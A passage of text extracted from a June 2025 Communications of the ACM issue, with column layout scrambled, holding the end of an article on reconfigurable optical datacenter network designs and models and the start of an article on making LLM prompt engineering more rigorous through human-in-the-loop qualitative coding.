uni-regular designs: the higher the tax, network topologies. In particular, re- tering frequency/color to a different
the lower the throughput.1,15,27 configurable topologies can reduce output port8 (Figure 3b bottom). Grat-
There are further limitations associ- the high bandwidth tax of static net- ings are very simple, passive building
ated with existing datacenter network works by dynamically providing shorter blocks with no moving parts that do
designs. For example, while the fiber- paths, or even direct connections. not need any power. Each grating sim-
optic links widely used in datacenters RDCNs are enabled by optical ply diffracts or routes incoming light to
can meet high-bandwidth demands, switching technologies, which fa- an output port based on its wavelength.
the optical–electrical–optical conver- cilitate quick changes in topological This concept can therefore be used for
sion necessary to connect these links to interconnections, for example, be- physical-layer switching by equipping
power-hungry electrical packet switch- tween datacenter racks. More specifi- each node’s transceivers with tunable
es is costly and introduces inefficiencies cally, RDCNs are often realized using lasers: The wavelength (represented by
and overhead.28 Current datacenters OCSs: Rather than actually rewiring color in the figure) serves as a proxy for
are also often inflexible, in that they are the datacenter, the (electrical) ToRs the destination address.
optimized for homogeneous hardware. are connected to a set of OCSs, and at There are a variety of alternative
For example, a fat-tree topology requires any given time, each OCS provides a switching technologies enabling re-
configurable datacenters,16 includ-
Figure 3. An example of an RDCN. (a) A topology with eight ToR switches and two optical ing nanosecond tunable lasers,20
spine switches. Each switch is configured with a matching between its ports (violet arcs)
to create optical circuits between ToR pairs. (b) Examples of two types of reconfigurable
digital micromirror devices,13 and
optical switches that enable dynamic topologies through reconfiguration of the matching liquid-crystal-on-silicon wavelength
between ports. selective switches.31 Different tech-
nologies have different advantages,
in terms of performance or high-pre-
OCS OCS cision manufacturing requirements.
Moving
mirrors For example, liquid-crystal-on-silicon
systems can typically be packed more
Passive compactly due to the absence of mov-
gratings
ing parts. While conventional MEMS-
based beam-steering cross-connects
(a) RDCN topology with two optical circuit (b) Mirror- and frequency-
switches (OCSs) as spines based OCSs cannot provide sub-millisecond
switching functionalities for large
datacenters, alternative noncrossbar
solutions.
are limited only at ToRs), thus remov- which possible datacenter network
ing a bottleneck.b Furthermore, such designs can be classified concerns
an optical infrastructure can remain whether they are static or dynamic. As
unchanged even as the electrical infra- discussed earlier, traditional networks
structure is upgraded incrementally are static in nature and rely on multi-
and heterogeneously. hop forwarding (thus incurring a band-
Different types of reconfigurable width tax), while emerging dynamic
switches correspond to different types topologies can provide more direct con-
of RDCNs, as we will discuss in more nectivity but incur a latency tax (which
detail in the next section. However, depends on the frequency of topology
independent of the technology used, reconfiguration). Moreover, there is a
all such dynamic networks share a second, and, as we will see, independent
common advantage and a common dimension, along which datacenter
disadvantage. The advantage: By pro- networks can be classified: whether
viding topological shortcuts, dynamic they are demand-oblivious or demand-
datacenter networks can reduce the aware. We therefore propose classifying
bandwidth tax, namely, the overhead datacenter designs in two dimensions:
incurred in multi-hop forwarding. For static vs. dynamic and demand-oblivi-
example, while the network diameter ous vs. demand-aware. This classifica-
in Figure 2 is four, in Figure 3a, the tion implies four main topology types,
expected route length can be as low as as illustrated in Figure 4a. For each of
one, depending on the demand and these four types, multiple realizations
the optimized topology. However, dy- are possible:
namic optical switching also comes at ˲ Static, demand-oblivious: As dis-
a price. In contrast to static networks, cussed earlier, traditional datacenter
RDCNs additionally incur a latency networks are based on static and de-
tax; optical links are not available dur- mand-oblivious topologies, for exam-
ing reconfiguration, and reconfigura- ple, fat-tree or expander graphs topolo-
tion takes time and therefore entails gies.2,32,34 Recall that these networks are
overhead (for example, related to buff- optimized for the worst-case traffic sce-
ering and throughput1,3,15). While the nario by establishing many disjointed
latency tax is inherent to dynamic to- short paths.
pologies, its magnitude depends on ˲ Static, demand-aware: Instead of
the technology and architecture. For the traditional worst-case optimiza-
example, if the demand changes can tion, static networks may also be opti-
be predicted or are known, the latency mized in a demand-aware manner, to-
tax can be reduced by saving real-time ward a specific and fixed workload. In
computations; nevertheless, it cannot this case, we assume that the demand
be completely eliminated. matrix is known (or predicted) in ad-
vance. For example, Google28 recently
b Note that electrical switches are usually also introduced a practical and efficient
connected by fiber-optic links. slowly evolving (on the scale of days)
JU N E 2 0 2 5 | VO L. 6 8 | N O. 6 | C OM M U N IC AT ION S OF T HE ACM 49
research and advances
Figure 4. (a) Classification of the design space along two dimensions, i) static vs. dynamic topologies and ii) demand-oblivious vs.
demand-aware topologies, corresponding to four topology types. (b) Each topology type incurs different levels of bandwidth (BW) and
latency (LT) taxes. (c) Different types of traffic are better served by different types of systems.
Dynamic
Dynamic
RotorNet, Helios, FireFly All-to-All Large flows
Opera, ProjecToR,
Sirius, Mars SplayNet, Duo
BW Tax LT Tax BW Tax LT Tax
Static/Slow
Static/Slow
Static/Slow
(i) for example, (ii) for example, Delay Telemetry /
Clos, BCube, DAN, Jupiter sensitive Aggregation
Xpander Evolving
BW Tax LT Tax BW Tax LT Tax
topology for RDCNs based on demand and/or optimize for it). We illustrate Given these trade-offs and the desire
prediction. this in Figure 4b. In summary, static to match different traffic types to their
˲ Dynamic, demand-oblivious: Re- topologies have a lower latency tax (LT optimal network infrastructures, many
searchers started exploring highly dy- Tax) than dynamic topologies, while emerging datacenter network designs
namic but demand-oblivious topolo- demand-oblivious topologies have a are hybrid designs, supporting multiple
gies, for example, relying on rotor (or higher bandwidth tax (BW Tax) than modes of operation. We discuss some
round-robin) spine switches that period- demand-aware topologies. of them in the next section.
ically and quickly (on the scale of nano- A major cause of suboptimal perfor-
seconds) reconfigure the topology in a mance in datacenter networks is the Examples of Reconfigurable
predefined and fixed manner.1,3,8,23,24 mismatch between some common traf- Datacenter Networks Designs
˲ Dynamic, demand-aware: Dynamic fic patterns and the network topologies Reconfigurable datacenters have
and demand-aware topologies, also that serve them, as presented in Figure developed significantly in recent
called self-adjusting networks, can be 4c. In particular, different optical topol- years, from early prototypes to initial
reconfigured according to the current ogies on the design spectrum provide deployments. To highlight this
traffic pattern. Examples include He- different trade-offs. For example, mice evolution and the spectrum of related
lios,10 Firefly,7 ProjecToR,13 and, recent- flows, or delay-sensitive packets should system designs, we present some
ly, Cerberus,15 among others.9,13,17,30,33,35,39 be served on a static topology; sending examples here.
How do these designs fare against them on dynamic topologies that re- RotorNet24 and Sirius8 are examples
each other? It turns out that the opti- quire time for reconfiguration may re- of demand-oblivious, periodically re-
mal architecture depends on the traf- sult in high flow-completion times and configurable networks. RotorNet pio-
fic. Traffic with a significant spatial violation of their latency constraints. neered the idea of decoupling switch
structure (for example, a small num- On the other hand, elephant flows (for reconfiguration from traffic patterns.
ber of elephant flows) can benefit from example, in ML19 or data-mining appli- Each switch simply and independently
demand-aware network designs, while cations14) will benefit from dynamic, rotates through a fixed, static set of con-
uniform traffic may be better served demand-aware topologies. Since the figurations that provide uniform band-
by demand-oblivious networks. In reconfiguration time is relatively short width between all endpoints. This ap-
contrast, only dynamic and demand- compared with the transmission time proach allows for a fully decentralized
aware (self-adjusting) networks can op- for such large flows, the reconfigura- control plane: The round-robin switch
timally adapt to the temporal structure tion time cost can be amortized, and scheduling does not require demand
of evolving traffic. To systematically the throughput can be improved by estimation, schedule computation,
understand the trade-offs, recall that establishing direct links between fre- or schedule distribution, yet delivers
the throughput achievable by static quently communicating pairs. To give full bisection bandwidth for uniform
topologies is typically limited by the one more example, it has been shown traffic. To support arbitrary traffic pat-
bandwidth tax, whereas dynamic to- that due to its all-to-all nature, shuf- terns, RotorNet relies on a form of val-
pologies are subject to a latency tax. fling traffic—for example, for map-re- iant load balancing. RotorNet can ac-
This latency tax is likely to be higher in duce or all-gather collective operations commodate a hybrid optical/electronic
demand-aware networks, which, in ad- in ML—can benefit from dynamic, de- architecture to extend support to traffic
dition to physical reconfiguration, also mand-oblivious topologies that provide with lower latency requirements. Rotor-
require a more complex control plane periodic direct connectivity between all Net has also inspired several additional
(for example, to learn about the traffic rack pairs.8,23,24 demand-oblivious RDCN designs, such
as Opera23 (essentially a sequence of using the datacenter topology that best for establishing a new edge, we set the
expander graphs), Microsoft’s Sirius8 matches its requirements. Some opti- timeslot length Δ equal to the reconfig-
(providing unprecedented nanosec- cal switches are operated in a demand- uration time. Additionally, we assume
ond-granularity reconfiguration in an aware manner, creating a demand- that when a new edge e is established at
optically switched network), and Mars.1 aware topology that can best serve time t, that is, e ∈ Et and e ∉ Et−1, e cannot
To achieve very fast reconfigurations, elephant flows; some optical switches be used at time t, that is, ct (e) = 0, since
Sirius uses a combination of tunable are demand-oblivious, creating a de- this timeslot is devoted to reconfigura-
lasers and simple, passive gratings that mand-oblivious dynamic topology that tion. Note that before reconfiguration,
route light signals based on their wave- is best suited to all-to-all traffic; and yet designers will need to consider graceful
lengths. Sirius also comes with novel other optical switches create a static to- packet drain, or packet loss, or rerout-
congestion-control and time-synchro- pology that can best serve delay-sensi- ing via different paths.38 Additional re-
nization mechanisms. Google Jupi- tive short flows. strictions may also apply, for example,
ter28 is an example of a demand-aware, an inter-reconfiguration time c′ · Δ, en-
slowly evolving network, supporting in- Models of Reconfigurable suring that reconfigurations cannot oc-
cremental heterogeneity and dynamic Datacenter Networks cur too close to each other in time, for
application adaptation. Its OCSs dy- For studying and evaluating reconfigu- example, since some computation or
namically map an optical fiber input rable networks, evolving graphs25 are data collection is needed.
port to an output port through two sets a natural abstract model. In contrast Evolving graphs can also be realized
of MEMS mirrors that can be rotated in to the original evolving graph model, on the basis of a standard datacenter
two dimensions to create arbitrary port- a critical issue in our model is the re- architecture that connects ToRs. This
to-port mappings. Enabled by this OCS configuration time consumed for edge ToR-Matching-ToR (TMT) topology
layer, Google has eliminated the spine changes. In turn, this reconfigura- model, which is common in the litera-
layer from its datacenter networks, in- tion time introduces latency and can ture8,15,23,24 involves n ToR (leaf) switch-
stead connecting heterogeneous ag- influence important metrics such as es that are interconnected by a set of
gregation blocks in a direct mesh, and the throughput. Recently, Mars1 in- k optical spine switches. Each spine
therefore moving beyond fat-tree to- troduced a formal definition of peri- switch provides a n × n directed match-
pologies. odic evolving graphs in the context of ing between its input and output ports.
ProjecToR13 was the first proposal of oblivious reconfigurable networks, en- Depending on the type of spine switch
a dynamic, demand-aware datacenter abling the study of fundamental per- (or its mode of operation), the matching
network developed by Microsoft Re- formance trade-offs in these networks. within each spine switch can be static
search based on free-space optics. This The model can in fact universally cap- or can dynamically change over time, in
network design provides high scalabil- ture static, dynamic, demand-obliv- either a demand-oblivious or a demand-
ity and fan-out, enabled by dense mi- ious, and demand-aware topologies. aware manner. The current topology, Gt
cromirror devices (DMDs). The DMDs Formally, we define evolving graphs in at time t, is implemented as the union of
are placed near the ToRs and paired the following way: the k matching configurations. Figure
with mirrors fixed to the ceiling above 5a presents an example of a TMT model
the racks. Each DMD is programmed Definition 1 (Evolving Graph). with eight ToR switches, 000, 001, ... 111,
to target a specific mirror at the ceil- An evolving graph denoted by and three optical spine switches, S1, S2,
ing, guiding light to another ToR in G = (V, E ) is a sequence of directed S3, that use different matchings sched-
the datacenter. In ProjecToR, possible graphs, in which one graph is defined uling. S1 uses static matching, S2 uses
links are divided into two categories: for each timeslot t ∈ W (the set of whole demand-oblivious dynamic matching,
dedicated and opportunistic. Dedicat- numbers). The directed graph at time and S3 uses demand-aware dynamic
ed links carry small flows, possibly over t ∈ W is defined as Gt = (V, Et), where V is matching. Each ToR-spine link in the
multiple hops, and their configurations the set of n vertices and Et ⊆ V ×V is the figure represents one directed uplink
change at coarse time scales (for ex- set of directed edges at time t. Note that (to the spine switch’s input port) and
ample, daily). Opportunistic links carry an edge e ∈ V × V may appear in mul- one directed downlink (from the spine
large flows over single hops, and their tiple edge sets Et at different times t. switch’s output port). Figure 5b shows
configurations change rapidly based on The timeslot length is denoted by Δ the matching configurations used with-
current demand. [sec]. If not stated otherwise, the capac- in each spine switch at time t. These
Cerberus15 is motivated by the obser- ity of edge e ∈ Et at time t, denoted by matching configurations can overlap
vation that each existing network de- ct (e), is c for all edges and all times. (increasing the capacity of a ToR-to-ToR
sign, be it static or dynamic, demand- connection) or be disjointed. Dynamic
oblivious or demand-aware, has its Evolving graphs can be restricted to switches can change their matching
own specific advantages. In particular, specific families of graphs, for example, configurations over time. Figure 5c il-
different optical topologies provide where for every t, Gt is a degree-d bound- lustrates the topology of the evolving
different trade-offs, and the design ed graph or a r-regular graph, or where graph at time t, Gt. The set of nodes V is
used should depend on the demand. for every t, the edge set Et is periodic the ToR switches, and the set of edges
Accordingly, Cerberus is a hybrid data- with period Γ, that is, Et+Γ = Et (Γ-periodic Et is the union of the edges in the three
center network design that maximizes graphs). matchings. Using these matchings,
throughput by serving each traffic class To capture the reconfiguration time some special topologies can be cre-
JU N E 2 0 2 5 | VO L. 6 8 | N O. 6 | C OM M U N IC AT ION S OF T HE ACM 51
research and advances
Figure 5. A 3-regular evolving graph with eight nodes implemented in a ToR–matching–ToR (TMT) network example with eight ToR
switches and three optical spine switches: One has a static matching configuration, and the other two have dynamic matching configu-
rations (one demand-oblivious and one demand-aware). Each spine switch has eight input and output ports. a) TMT architecture. b) The
matching configurations inside each of the three switches at time t. c) The resulting 3-regular topology at time t, Gt.
000
Demand-oblivious Demand-aware S1 S2 S3
Spine
100 001
S1 static S2 dynamic S3 dynamic 000 000 000 000 000 000
001 001 001 001 001 001
010
010 010 010 010 010 010
011 011 011 011 011 011
101
100 100 100 100 100 100
101 101 101 101 101 101
Leafs (ToRs)
110 011
110 110 110 110 110 110
111 111 111 111 111 111
000 001 010 011 100 101 110 111 111
ated. For example, careful readers may or even needed to adapt, for example, jecToR (https://bit.ly/3GdstQQ); UCSD
observe that the matchings of S1 and S2 the routing layer or congestion-control professor George Papen describes the
create a 2-regular De Brujin graph that mechanisms for reconfigurable data- main technologies that enable optical
has some nice properties, such as sup- center networks (see, for example, Li et circuit switches that are used in recon-
porting greedy routing; it was recently al.,21 Liang et al.,22 Mukerjee et al.,26 and figurable datacenter networks such as
used in Duo38 and Mars.1 It is important Zerwas et al.38 for early works in these RotorNet, and how different technolo-
to note that although we abstractly con- directions)? Should we maintain a fixed gies fare against each other (https://
sider k spine switches here, each imple- network layering structure, or is a cross- bit.ly/3YvaEms); and Amin Vahdat, a
menting an n × n matching, each such layer approach justified, for example, for vice president at Google, discusses the
matching configuration can be split joint topology optimization and traffic advantages and disadvantages of the
across a set of several smaller switches engineering? What are the implications different datacenter architectures, and
in practice, as in Sirius.8 of reconfigurations on, for example, why machine learning applications may
buffer management1 or the traffic pat- particularly benefit from reconfigu-
Conclusion, Challenges Ahead, tern itself? Which functionality can be rable networks (https://bit.ly/44zUADE).
and Interviews with Experts supported in software (which is more A key challenge, according to Vah-
While reconfigurable datacenter topol- flexible), and which in hardware (which dat, concerns the control system of the
ogies are an exciting vision, they are also is more complex but more performant)? reconfigurable datacenter network,
a bold one. While the first concepts and Where should we deploy the optical cir- and its scalability. He envisions that
specific technologies for reconfigurable cuit switches—is the typical assump- future, improved control systems may
datacenter topologies are being actively tion that one layer of OCSs is enough in enable a faster and more fine-grained
developed at, for example, Google, the RDCNs justified? Should optical switch- adaptation of the topology, which can
field is very young. Early deployments es connect datacenter racks or rather further improve datacenter network
are small-scale and reconfigure slowly; entire pods? What is the optimal inter- performance. If decisions have to be
however, there are developments and play between electrical packet switches made within seconds or even millisec-
efforts to support more fine-grained and optical circuit switches in future hy- onds, it can be difficult or impossible
adaptations and hence further improve brid datacenters? And what is the cost of to collect sufficient information about
network performance. Reconfigurable such architectures? And so on. the network traffic in real time, and
networks, both demand-oblivious and To answer some of these questions, generally, the control system may have
demand-aware, introduce additional we provide complementary video inter- to combine both decentralized compo-
complexities, but also bear the poten- views, in which three leading experts nents (for fast reaction and robustness)
tial to simplify certain aspects of net- share with us their perspectives on and centralized components (for global
work operations. In general, the transi- reconfigurable datacenter networks, visibility and optimization). Multiple
tion to highly dynamic topologies will the state of the art, and the challenges controllers may also be organized in a
likely be long and strenuous. ahead. hierarchical manner. By default, exist-
Operational and deployment chal- Video interviews with experts. MIT ing distributed system software is not
lenges. In terms of operational and de- professor Manya Ghobadi shares with used to exert control at such granular-
ployment challenges, we currently do us her insights on the special struc- ity. Despite these challenges, Vahdat
not have a good understanding of the ture of datacenter traffic compared emphasizes that reconfigurable data-
implications of dynamic networks from with other communication traffic, and center networks also bear a potential
the perspective of the other layers of the how this structure can be exploited in for simplifying datacenter planning and
networking stack. When is it beneficial reconfigurable networks such as Pro- operations in many aspects, for exam-
ple, by naturally supporting heteroge- the European Research Council (ERC), Implementation. USENIX (2020), 1–18.
24. Mellette, W.M. et al. Rotornet: A scalable, low-
neous network elements and therefore grant agreement no. 864228 (Adjust- complexity, optical datacenter network. In
incremental hardware upgrades. Net), as well as by the Israeli Science Proceedings of the ACM SIGCOMM 2017 Conf. on
Data Communication. ACM (2017), 267–280.
Ghobadi sees a big opportunity, but Foundation, grant ISF 2497/23. 25. Michail, O. An introduction to temporal graphs: An
also a challenge, for reconfigurable net- algorithmic perspective. Internet Mathematics 12, 4
(2016), 239–280.
works coming from ML applications. References 26. Mukerjee, M.K. et al. Adapting TCP for reconfigurable
1. Addanki, V., Avin, C., and Schmid, S. Mars: Near- datacenter networks. In 17th USENIX Symp. on
ML workloads often feature significant optimal throughput with shallow buffers in Networked Systems Design and Implementation.
temporal and spatial structure, and traf- reconfigurable datacenter networks. In Proc. ACM USENIX (2020), 651–666.
SIGMETRICS 7, 1 (2023), 1–43. 27. Namyar, P. et al. A throughput-centric view of the
fic is fairly predictable, which can sim- 2. Al-Fares, M., Loukissas, A., and Vahdat, A. A scalable, performance of datacenter topologies. In Proceedings
plify the control plane of reconfigurable commodity data center network architecture. ACM of the ACM SIGCOMM Conf. ACM (2021), 349–369.
SIGCOMM Computer Communication Rev. 38, 4 (Aug. 28. Poutievski, L. et al. Jupiter evolving: Transforming
datacenters. However, collecting and 2008), 63–74. Google’s datacenter network via optical circuit
characterizing these traffic patterns and 3. Amir, D. et al. Optimal oblivious reconfigurable switches and software-defined networking. In
networks. In Proceedings of ACM STOC. ACM (2022), Proceedings of the ACM SIGCOMM 2022 Conf. ACM
tailoring a reconfigurable network for a 1339–1352. (2022), 66–85.
4. Avin, C. et al. On the complexity of traffic traces and
very specific workload, such as distrib- implications. Proceedings of the ACM on Measurement
29. Roy, A. et al. Inside the social network’s (datacenter)
network. In Proceedings of the 2015 ACM Conf. on
uted ML, still imposes significant opera- and Analysis of Computing Systems 4, 1 (2020), 1–29. Special Interest Group on Data Communication. ACM
5. Avin, C., Mondal, K., and Schmid, S. Demand-aware
tional and research challenges. network designs of bounded degree. In 31st Intern.
(2015), 123–137.
30. Schmid, S.C. et al. SplayNet: Towards locally self-
According to Papen, dynamic to- Symp. on Distributed Computing. Schloss Dagstuhl- adjusting networks. IEEE/ACM Trans.on Networking
Leibniz-Zentrum fuer Informatik (2017).
pologies also introduce novel failure 6. Avin, C. and Schmid, S. Toward demand-aware
24, 3 (2016), 1421–1433.
31. Shakeri, A. et al. Traffic allocation strategies in
scenarios, for which current debugging networking: a theory for self-adjusting networks. WSS-based dynamic optical networks. J. of Optical
ACM SIGCOMM Computer Communication Rev. 48, 5
tools are insufficient or not applicable (2018), 31–40.
Communications and Networking 9, 4 (2017), B112–
B123.
at all. Since in large networks, failures 7. Azimi, N.H. et al. Firefly: A reconfigurable wireless 32. Singh, A. et al. Jupiter rising: A decade of Clos
data center fabric using free-space optics. ACM topologies and centralized control in Google’s
can happen frequently, detection and SIGCOMM Computer Communication Rev. 44, 4 datacenter network. ACM SIGCOMM Computer
reaction must be fast. Failure scenarios (2014), 319–330. Communication Rev. 45, 4 (2015), 183–197.
8. Ballani, H. et al. Sirius: A flat datacenter network with 33. Teh, M.Y., Wu, Z., and Bergman, K. Flexspander:
can also be technology-dependent and nanosecond optical switching. In Proceedings of the Augmenting expander networks in high-performance
generally, different technologies cur- ACM SIGCOMM 2020 Conf. ACM (2020), 782–797. systems with optical bandwidth steering. IEEE/OSA
9. Chen, K. et al. OSA: An optical switching architecture J. of Optical Communications and Networking 12, 4
rently come with different trade-offs. for data center networks with unprecedented (2020), B44–B54.
Which architecture will be most at- flexibility. IEEE/ACM Trans Netw. 22, 2 (2014), 34. Valadarsky, A. et al. Xpander: Towards optimal-
498–511. performance datacenters. In Proceedings of the 12th
tractive in terms of the performance 10. Farrington, N. Helios: A hybrid electrical/optical switch Intern. on Conf. on Emerging Networking EXperiments
architecture for modular data centers. SIGCOMM
and robustness it provides, as well as Comput. Commun. Rev. 40, 4 (Oct. 2010), 339–350.
and Technologies. ACM (2016).
35. Venkatakrishnan, S.B., Alizadeh, M., and Viswanath,
its hardware and operational costs, is 11. Figiel, A. et al. Efficient algorithms for demand- P. Costly circuits, submodular schedules and
aware networks and a connection to virtual network
currently unclear and will likely evolve embedding. In 28th Intern. Conf. on Principles of
approximate carathéodory theorems. In Proceedings
of the 2016 ACM SIGMETRICS Intern. Conf. on
over time. At least in terms of energy Distributed Systems. Schloss Dagstuhl – Leibniz- Measurement and Modeling of Computer Science.
Zentrum für Informatik (2024).
costs, optical switches are expected to 12. Foerster, K.-T. Analyzing the communication clusters
ACM (2016), 75–88.
36. Wang, W. et al. TopoOpt: Co-optimizing network
be more efficient compared with tradi- in datacenters. In Proceedings of the ACM Web Conf. topology and parallelization strategy for distributed
2023. ACM (2023), 3022–3032.
tional switches.8 13. Ghobadi, M. et al. Projector: Agile reconfigurable
training jobs. In 20th USENIX Symp. on Networked
Systems Design and Implementation. USENIX (2023),
Research challenges. Last but not data center interconnect. In Proceedings of the ACM 739–767.
SIGCOMM Conf. ACM (2016), 216–229. 37. Xiao, W. et al. Gandiva: Introspective cluster
least, the vision of reconfigurable data- 14. Greenberg, A. et al. Vl2: A scalable and flexible data scheduling for deep learning. In 13th USENIX Symp.
center networks and topology engineer- center network. In Proceedings of the ACM SIGCOMM on Operating Systems Design and Implementation.
2009 Conf. on Data Communication. ACM (2009), USENIX (2018), 595–610.
ing also poses interesting graph-theo- 51–62. 38. Zerwas, J. et al. Duo: A high-throughput
retical research problems. The design 15. Griner, C. et al. Cerberus: The power of choices in reconfigurable datacenter network using local routing
datacenter topology design-a throughput perspective. and control. Proceedings of the ACM on Measurement
of self-adjusting networks is related to Proceedings of the ACM on Measurement and Analysis and Analysis of Computing Systems 7, 1 (2023).
graph spanners and embedding prob- of Computing Systems 5, 3 (2021), 1–33. 39. Zhou, X. et al. Mirror mirror on the ceiling: Flexible
16. Hall, M.N. et al. A survey of reconfigurable optical wireless links for data centers. ACM SIGCOMM
lems,5,11 as well as to self-adjusting data networks. Optical Switching and Networking 41, Comput. Commun. Rev. 42, 4 (2012), 443–454.
(2021), 100621.
structures.6 In a paper,5 we presented 17. Kandula, S., Padhye, J., and Bahl, P. Flyways to de-
initial theoretical results, relating the congest data center networks. In Proceedings of ACM Chen Avin ([email protected]) is a professor in the School
Workshop on Hot Topics in Networks. ACM (2009).
average path length in a demand-aware 18. Kandula, S. et al. The nature of data center traffic:
of Electrical and Computer Engineering at Ben Gurion
University of the Negev, Israel.
network to the entropy of the demand. measurements & analysis. In Proceedings of the
9th ACM Internet Measurement Conf. ACM (2009), Stefan Schmid is a professor in the Faculty of Electrical
However, for many performance met- 202–208. Engineering and Computer Science at the Technical
rics, including throughput,1,3 we cur- 19. Khani, M. et al. Sip-ml: high-bandwidth optical network University Berlin, Germany.
interconnects for machine learning training. In
rently know only very little about how Proceedings of the 2021 ACM SIGCOMM Conf.. ACM
they can be optimized algorithmically (2021), 657–675. This work is licensed under a
20. Lange, A. et al. Sub-nanosecond optical switching Creative Commons Attribution
in datacenter networks with controlled using chip-based soliton microcombs. In Optical Fiber International 4.0 License.
topologies. Communication Conf. The Optical Society (2020). © 2025 Copyright held by the owner/author(s).
21. Li, J. et al. Uniform-cost multi-path routing for
reconfigurable data center networks. In Proceedings
Acknowledgments of the ACM SIGCOMM 2024 Conf. ACM (2024),
433–448.
We would like to thank our interview- 22. Liang, C. et al. Negotiator: Towards a simple yet
ees Manya, Amin, and George, and all effective on-demand reconfigurable datacenter
network. In Proceedings of the ACM SIGCOMM 2024 Watch the authors discuss
our co-authors and students working Conf. ACM (2024), 415–432. this work in the exclusive
23. Mellette, W.M. et al. Expanding across time to Communications video.
with us on self-adjusting networks over deliver bandwidth efficiency and low latency. In 17th https://cacm.acm.org/videos/
the last years. Research supported by USENIX Symp. on Networked Systems Design and datacenter-networks
JU N E 2 0 2 5 | VO L. 6 8 | N O. 6 | C OM M U N IC AT ION S OF T HE ACM 53
research and advances
DOI:10.1145/ 3709599
drug discovery.35 There is growing con-
Can prompt engineering be made more cern, however, that a large portion of
this success hinges on prompt engi-
reliable, verifiable, and generalizable? neering, which is often an ad hoc meth-
od to revise prompts being fed into an
BY CHIRAG SHAH LLM to achieve a desired response or
analysis.24
From Prompt
Unfortunately, using prompt engi-
neering for scientific research is dan-
gerous. At best, there is the possibility
of creating a feedback loop with a self-
Engineering
fulfilling prophecy. At worst, research-
ers may be overfitting hypotheses to
data, leading to untrustworthy claims
and findings. In most cases, overreli-
ance on prompt engineering can lead
to Prompt
to unexplainable, unverifiable, and less
generalizable outcomes,6,25,27,37 lacking
a scientific approach.
We consider a scientific approach to
Science with
be the one that is well-documented and
transparent, verifiable, repeatable, and
free of individual biases and subjec-
tivity. Most prompt-engineering tech-
niques violate at least one of these prin-
Humans in
ciples. While such ad hocness can be
bad in most situations, it is especially
problematic when it comes to scientific
research, which demands a certain lev-
the Loop
el of rigor. Thus, if we want to continue
harnessing the power of LLMs, we need
to do so in a responsible manner and
with enough scientific rigor.
Here, we focus on research areas and
key insights
˽ LLMs are increasingly being used in
scientific research, but their application
often involves ad hoc decisions that
can affect research quality. Forcing
as the sophistication and
I N R ECEN T Y E A R S , LLMs to produce desired results through
prompt adjustments in an unscientific
capabilities of large language models (LLMs) have manner may lead to unverified and
harmful outcomes.
grown, so have the tasks for which they’re applicable,
˽ We could use humans in this process,
going beyond information extraction and synthesis15 but overreliance on them may defeat
the purpose of using LLMs as a strategic
to include analysis, content creation, and reasoning.8 tool. A new method shows how humans
Unsurprisingly, many researchers find them useful for and LLMs can work in collaboration,
bringing verifiability and trustworthiness
research tasks, such as identifying relevant papers,19 as well as objectivity and scalability in
IMAGE BY ZHITKOV BORIS
data analysis.
synthesizing literature reviews,3 writing proposals,11 ˽ The method, demonstrated here through
and analyzing data.31 They have also been found two applications, includes rigorous
labeling, deliberation, and documentation
effective for investigative tasks, such as steps to reduce subjectivity.
applications in which an LLM is used neering process in a research setting. possible, community-validated metric
for labeling text data, such as identify- Here, a researcher is interested in get- for assessment.
ing user tasks or intents, extracting sen- ting some input data analyzed or la- ˲ Discuss individual differences and
timents, and deriving issues from user beled for a downstream application. biases with the goal of rooting them
reports. Building on an LLM’s ability to To get the desired outcomes, the set out. This will help create assessments
summarize or synthesize data, many of instructions—the prompt provid- and a set of instructions that can be
recent research projects have deployed ed to the LLM—is iteratively revised, understood and carried out by any re-
them for these tasks.24,31 There are also an approach used in many recent searcher with a reasonable set of skills
efforts to use LLMs for generating data- works.8,16,30,40 While this can be effec- so they can replicate the experiments
sets and benchmarks,20,34 which could tive, it leaves us with many potential and achieve similar results.
be foundations for future research. issues. For instance, if the prompt is Though a few recent works have
Therefore, it is paramount that out- revised by a single researcher in an ad shown promise in addressing these
comes from LLMs are thoroughly vali- hoc manner just to fine-tune the out- desiderata, they still lack enough rigor
dated and proven trustworthy. put, personal biases and subjectivity to meet the requirements of transpar-
In this article, we demonstrate how may be introduced. If this process is ency, objectivity, and replicability. For
to do this by creating a verifiable and not well-documented, it may be dif- instance, Shah et al.7 use a verifying
replicable method of prompt science ficult to understand or mitigate these method for prompt generation, but
that aids in prompt engineering. Spe- issues. This may also make it more dif- their approach lacks verification of cri-
cifically, we take inspiration from a rich ficult for someone to verify or replicate teria as well as replicability for differ-
literature and methods of qualitative the process. These issues may hinder ent datasets.
coding to employ a human in the loop scientific progress that relies on sys-
for verifying responses from LLMs and tematic knowledge being generated, Methodology
systematically constructing prompts. questioned, and shared. There may also In the previous section, we described
While not a universal solution for all be issues of feedback loops and self-ful- how a typical prompt-engineering pro-
prompt-engineering situations, this filling prophecies, which are especially cess works; essentially, it involves revis-
approach is nonetheless applicable to dangerous when we are dealing with ing the prompt to an LLM in order to
many scenarios involving human- or highly opaque systems such as LLMs. fit the desired response and/or down-
machine-generated annotations. When using LLMs for scientific re- stream application. We identified that
search, we need some level of reliabil- one of the problems with this endeavor
Prompt Engineering ity, objectivity, and transparency in the is that it is quite ad hoc, unreliable, and
Prospects and Problems process. Specifically, there are three not generalizable. Even with enough
LLMs are built on a transformer ar- problems we need to address: 1) indi- documentation of how the final prompt
chitecture that contains encoder and vidual bias and subjectivity, 2) vague was generated, one cannot ensure that
decoder modules, and are trained on criteria for assessment of bending the the same process will yield the same
large corpora of text data. What an LLM criteria to match LLM’s abilities, and 3) quality output in a different situation—
generates depends heavily on the inner narrow focus to a specific application be it with a different LLM or the same
workings of this architecture as well as instead of a general phenomenon. To LLM at a different time. To overcome
the training data. Most users and re- address these issues, we propose the these problems, in this section we de-
searchers do not have the ability to di- following steps: scribe an approach that first iterates
rectly change that architecture or the ˲ Ensure at least two qualified re- over the criteria for assessing an LLM’s
training process. They can, however, searchers are involved in the whole response and then iterates over the
apply various techniques such as fine- process. prompt in a systematic way, using a hu-
tuning,10,12 prompt engineering,33 and ˲ Before focusing on revising the man in the loop. Our method is inspired
retrieval-augmented generation (RAG)39 prompt to produce desirable outcomes, by a typical qualitative coding process.
to shape the outputs as they desire. clearly and objectively articulate what a Qualitative coding with multiple as-
Figure 1 shows the conceptual flow desirable outcome would be. This will sessors. The problem we are trying to
of a typical prompt revision or engi- involve establishing a reliable and, if address is that of constructing a prompt
